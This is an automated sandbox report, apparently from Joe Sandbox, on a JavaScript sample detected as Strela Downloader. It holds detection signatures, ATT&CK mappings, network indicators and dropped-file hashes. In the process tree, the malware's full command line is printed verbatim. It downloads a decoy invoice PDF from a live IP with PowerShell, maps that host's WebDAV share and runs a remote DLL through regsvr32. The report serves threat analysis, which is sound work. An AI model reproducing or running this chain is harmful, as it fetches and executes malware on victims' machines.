Windows
Analysis Report
2649727971102843099.js
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- wscript.exe (PID: 6404 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\26497 2797110284 3099.js" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 6356 cmdline:
"C:\Window s\System32 \cmd.exe" /c powersh ell.exe -C ommand "In voke-WebRe quest -Out File C:\Us ers\user~1 \AppData\L ocal\Temp\ invoice.pd f http://1 93.143.1.2 05/invoice .php"&&sta rt C:\User s\user~1\A ppData\Loc al\Temp\in voice.pdf& &cmd /c ne t use \\19 3.143.1.20 5@8888\dav wwwroot\&& cmd /c reg svr32 /s \ \193.143.1 .205@8888\ davwwwroot \366671727 24.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 1528 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 6496 cmdline:
powershell .exe -Comm and "Invok e-WebReque st -OutFil e C:\Users \user~1\Ap pData\Loca l\Temp\inv oice.pdf h ttp://193. 143.1.205/ invoice.ph p" MD5: 04029E121A0CFA5991749937DD22A1D9) - Acrobat.exe (PID: 6956 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\Acrobat .exe" "C:\ Users\user ~1\AppData \Local\Tem p\invoice. pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) - AcroCEF.exe (PID: 1476 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 7336 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=21 04 --field -trial-han dle=1660,i ,980394606 0303903797 ,343852518 8333256411 ,131072 -- disable-fe atures=Bac kForwardCa che,Calcul ateNativeW inOcclusio n,WinUseBr owserSpell Checker /p refetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
- svchost.exe (PID: 7224 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_StrelaDownloader | Yara detected Strela Downloader | Joe Security |
System Summary |
---|
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): |
Source: | Author: Florian Roth (Nextron Systems), Hieu Tran: |
Source: | Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: frack113, Nasreddine Bencherchali: |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: frack113: |
Source: | Author: vburov: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Author: Joe Security: |
Click to jump to signature section
Software Vulnerabilities |
---|
Source: | Argument value : | Go to definition | ||
Source: | Argument value : | Go to definition |
Source: | Child: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Spam, unwanted Advertisements and Ransom Demands |
---|
Source: | File source: |
System Summary |
---|
Source: | COM Object queried: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Initial sample: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Data Obfuscation |
---|
Source: | Anti Malware Scan Interface: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window found: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Last function: | ||
Source: | Last function: |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 32 Scripting | Valid Accounts | 1 Command and Scripting Interpreter | 32 Scripting | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 1 Network Share Discovery | Remote Services | Data from Local System | Data Obfuscation | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 1 Exploitation for Client Execution | 1 DLL Side-Loading | 1 DLL Side-Loading | 31 Virtualization/Sandbox Evasion | LSASS Memory | 11 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 2 PowerShell | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 31 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 22 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | ReversingLabs |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
193.143.1.205 | unknown | unknown | 57271 | BITWEB-ASRU | true |
IP |
---|
127.0.0.1 |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1587781 |
Start date and time: | 2025-01-10 17:56:47 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 5m 18s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 21 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | 2649727971102843099.js |
Detection: | MAL |
Classification: | mal100.rans.spyw.expl.evad.winJS@27/63@0/2 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
- Excluded IPs from analysis (whitelisted): 2.23.240.205, 162.159.61.3, 172.64.41.3, 2.23.242.162, 23.209.209.135, 199.232.214.172, 2.16.168.105, 2.16.168.107, 2.22.242.11, 2.22.242.123, 23.204.152.213, 23.204.152.210, 192.168.2.7, 13.107.246.45, 52.22.41.97, 52.149.20.212, 96.17.64.171
- Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, time.windows.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtCreateFile calls found.
- Report size getting too big, too many NtCreateKey calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description |
---|---|---|
11:57:47 | API Interceptor | |
11:57:51 | API Interceptor | |
11:57:52 | API Interceptor | |
11:57:59 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
193.143.1.205 | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
BITWEB-ASRU | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.7066877647201922 |
Encrypted: | false |
SSDEEP: | 1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6Vqi:2JIB/wUKUKQncEmYRTwh0e |
MD5: | EA38EBC8E018BC75486E889A548228B8 |
SHA1: | 6666DDB105CBB4557C328870C07FE00E5466EF04 |
SHA-256: | 8E54C3CDD8DF43EB0125EA8CB99F7226F9E0880C2313E69FD0B3D973A59E555C |
SHA-512: | 4E57D3300CC1901FA43D11411201882638C5EF7984E3452578794F667F24518885B337A59EB936589467A84D11FE2DF9459531876DA78D68DA58BD223B74130E |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.7899801242630293 |
Encrypted: | false |
SSDEEP: | 1536:rSB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+dzV:razaPvgurTd42UgSii |
MD5: | 3441789F1528781F916BDD160BA452DD |
SHA1: | DCB85C781621AAB63A38A0D87F95C9E5FCFC3A32 |
SHA-256: | 30418FC057FBE657203AEC71CDAE63A457D98A82A96865DA5178C07541931C67 |
SHA-512: | E736C940370016C12E43585C212AEACE1EAEF922A8B0A189E24D5FAC0A302F8F6096E9BCC9A85A8A714BBA0675F59A7903346259D09881756E19863C131C3C61 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16384 |
Entropy (8bit): | 0.08138424859495741 |
Encrypted: | false |
SSDEEP: | 3:Al6YenE8ZRyAt/57Dek3JEBCkZl1ollEqW3l/TjzzQ/t:Al6znrbR3tEwkbemd8/ |
MD5: | 84149D66EA2A5E727DDFA8A44BF6B9B1 |
SHA1: | ABDFC492D4FC80312E219F994BE7602F7A228DF1 |
